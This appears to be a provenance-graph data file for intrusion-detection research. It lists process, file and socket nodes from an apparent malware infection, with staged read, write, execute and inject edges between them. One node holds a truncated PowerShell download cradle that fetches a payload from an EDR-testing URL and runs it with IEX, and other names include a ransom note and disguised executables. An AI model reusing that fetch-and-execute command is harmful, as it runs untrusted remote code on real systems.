44
MP-PowerShell.exe
TP-Register-CimProvider.exe
MP-query.exe
TF-Downloader_ns-hSm1.exe
SF-C:\Users\admin\AppData\Local\Temp\\badempty.cmd
TP-powercfg.exe
MP-Powershell.exe
TF-C:\Users\admin\AppData\Local\Temp\IXP002
MF-C:\Windows\System32\Notepad.exe
MF-\Windows\SysWow64\regsvr32.exe
MF-C:\Users\admin\AppData\Roaming\sMURZJ0sQ\MMFbbhOyNS.exe
SF-C:\Users\admin\AppData\Roaming\skmt
MF-3893.bmp
TP*-RdrCEF.exe 
SF-C:\Users\User\appdata\local\temp\rpvbh.jar
MF-C:\Users\admin\AppData\Local\Temp\_vnw.exe
MF-\Desktop\YOUR_FILES.txt
MF-\T1106.exe
MF-\Users\admin\AppData\Local\Temp\Client.pdf
MF-%temp%\service
MP*-KLSetup.exe.scr
MP-nsD232.tmp
MF-C:\Users\admin\AppData\Local\Temp\is-9DRF4.tmp
MF-\Users\admin\AppData\Local\Temp\u2qkihjw.cmd
TP-ns9423.tmp 
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MF-bcdedit.exe
MP*-Nixware.exe
MP-RFQ # 1045981 - MAA_D Plant Project r01.exe 
SF-C:\Users\admin\AppData\Local\Temp\CareUEyes_setup.exe
MF-\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
TF-\Windows\System32\rundll32.exe\rundll32.exe
SF-C:\Users\admin\AppData\Local\Temp\main_bin
MP-wusa.exe
MP*-nsCA5C.tmp
TP-PowerShell.exe
MF-\Users\User\29630.ico.vb
SF-C:\TalkWorld\talkworld
SF-C:\Windows\system32\ROUTE
MP-Document.pdf_Slayed.scr.exe
MF-C:\ServerComponenthostNet\z3dzg.bat
SF-C:\Users\admin\AppData\Local\Temp\0520c252-bcdc-4fcf-b657-4d4cf2b0bde1.cab
SF-C:\Program Files\Google\Chrome\Application\chrome
TF-\Users\admin\AppData\Local\Temp\c3c6a5675d32fe330b83debceb63d60e.exe
100
0 1 FR-1
0 2 UK-1
1 3 WR-1
1 4 WR-1
1 5 FR-1
5 3 WR-1
5 4 WR-1
6 3 RD-1
6 4 UK-1
5 7 WR-1
5 8 WR-1
5 9 WR-1
5 10 WR-1
5 11 WR-1
5 12 WR-1
13 7 WR-1
13 8 WR-1
13 9 WR-1
13 10 EX-1
13 11 CD-1
13 12 RD-1
13 14 RD-1
13 15 WR-1
13 16 EX-1
13 17 EX-1
13 18 WR-1
13 19 WR-1
20 11 WR-2
20 12 EX-2
13 20 IJ-1
20 14 RD-2
20 15 CD-2
20 16 WR-2
20 17 RD-2
20 18 RD-2
20 19 WR-2
21 12 WR-2
13 21 UK-1
20 22 WR-2
20 23 CD-2
24 14 WR-2
24 15 WR-2
24 16 WR-2
24 17 WR-2
24 18 WR-2
24 19 WR-2
20 24 IJ-2
24 22 WR-2
24 23 WR-2
25 20 RF-2
24 25 ST-3
20 26 CD-2
24 26 WR-2
27 17 WR-3
27 18 RD-3
27 19 WR-3
27 22 RD-3
27 23 WR-3
24 27 IJ-2
25 27 RF-3
27 26 EX-3
28 18 RD-3
28 19 WR-3
20 28 UK-2
24 29 EX-2
27 29 EX-3
24 30 RD-2
27 30 EX-3
24 31 EX-2
27 31 WR-3
27 32 WR-3
33 25 ST-3
33 26 WR-3
27 33 UK-3
34 25 ST-4
34 26 WR-4
34 29 EX-4
34 30 WR-4
34 31 WR-4
34 32 WR-4
35 26 RD-4
35 29 RD-4
35 30 WR-4
35 31 WR-4
35 32 WR-4
34 35 IJ-4
34 36 WR-4
35 36 WR-4
34 37 WR-4
35 37 EX-4
34 38 EX-4
35 38 CD-4
39 30 RD-4
39 31 WR-4
39 32 WR-4
34 39 UK-4
35 40 EX-4
35 41 CD-4
35 42 RD-4
35 43 UK-4

